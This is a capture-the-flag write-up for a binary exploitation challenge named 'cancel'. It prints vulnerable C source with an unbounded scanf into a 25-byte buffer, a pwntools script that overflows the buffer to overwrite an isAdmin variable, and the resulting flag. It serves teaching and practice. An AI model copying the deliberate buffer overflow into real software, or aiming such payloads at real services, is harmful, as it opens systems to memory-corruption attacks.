AUCHALL - [Pwn] - cancel

You,AUCHALLPwn
Back

Challenge Description

I'm not sure what this does, but it seems to be vulnerable to something.

Solution

First thing we would check is binary protections

Alt text

Only NX is enabled which means that we cannot execute our shellcode

PIE is disabled

On checking source code I found out that we need to change isAdmin to 0xdeadc0de

Source Code

#include <stdio.h>

void win(void) {
    FILE *file;
    char line[100];
    file = fopen("/flag", "r");
    if (file == NULL) {
        puts("[FAIL] Contact an admin.\n");
        exit(1);
    }
    while (fgets(line, sizeof(line), file) != NULL) {
        puts(line);
    }
    fclose(file);
}

void vuln() {
	int isAdmin = 0;
	char buffer[25];
    char _admin;
	fflush(stdout);

    printf("Hi, are you an admin? (y/n)? ");
    fflush(stdout);
    scanf("%c", &_admin);

    if (_admin == 'y') {
        printf("Ok, you are an admin. What's the password? ");
        fflush(stdout);
        scanf("%s", buffer);
        if (isAdmin == 0xdeadc0de) {
            win();
        } else {
            printf("Sorry, you are not an admin.\n");
        }
    } else {
        printf("Ok, you are not an admin.\n");
    }
}

int main() {
    setbuf(stdin, NULL);
	setbuf(stdout, NULL);
	setbuf(stderr, NULL);
	vuln();
}

isAdmin comes after 25 offset

Solution

I made a simple pwntools script to get this working

from pwn import *
 
io = remote('section-b.cy243l.ooguy.com', PORT)
 
print(io.recv())
print(io.sendline(b'y'))
print(io.recv())
payload = cyclic(25) + p64(int("0xdeadc0de", 16))
print(io.sendline(payload))
print(io.recv())
io.interactive()

Flag

Flag is dynamic

CY243L{0v3rwr1t1ng_th3se_varsss_CCdEFbA_Z5Ue_Jkei}

Writeups 2023 © RootxRAN.